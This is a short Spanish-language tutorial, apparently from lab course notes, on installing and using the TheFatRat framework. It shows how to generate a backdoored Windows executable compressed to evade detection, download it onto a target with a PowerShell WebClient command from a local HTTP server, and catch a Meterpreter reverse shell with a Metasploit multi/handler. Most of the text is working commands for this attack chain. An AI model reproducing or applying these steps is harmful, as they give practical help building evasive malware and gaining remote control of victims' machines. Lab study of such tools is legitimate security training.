TheFatRat

Es un framework de vulneración de defensas bastante popular.

Esto indica que es algo contraproducente porque es más conocido y posiblemente se parcheen rápido.

Se basa o toma fundamento en otros frameworks antiguos ya conocidos como Veil-Framework, Shelter, Unicorn, etc...


git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatRat
chmod +x setup.sh && ./setup.sh

Si queremos actualizarlo


cd TheFatRat
./update && chmod +x setup.sh && ./setup.sh

images/64-1.png

Vamos aceptando y seleccionando las instalaciones de los paquetes necesarios que son bastantes.

images/64-2.png

Podemos modificar el directorio y crear un acceso directo.

images/64-3.png


sudo fatrat

Con esta herramienta podremos generar nuevos binarios con backdoors, crear backdoors en binarios legítimos o aplicaciones, paquetes debian... una buena cantidad de herramientas.

images/64-4.png

Vamos a probar la 2

images/64-5.png

Seleccionamos 2

images/64-6.png

images/64-7.png

Esto nos creara dos binarios uno normal y otro comprimido para que sea menos detectable.

images/64-8.png


sudo cp /root/Fatrat_Generated/Powerfull-fud.exe Desktop

Lo llevamos al escritorio y a la máquina windows.


(New-Object System.NET.WebClient).DownloadFile("http://192.168.20.129:8000/Powerfull-fud.exe", "FatRat.exe")

images/64-9.png

En kali :


msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options

images/64-10.png


set lhost 192.168.20.130
set lport 5555
exploit

images/64-11.png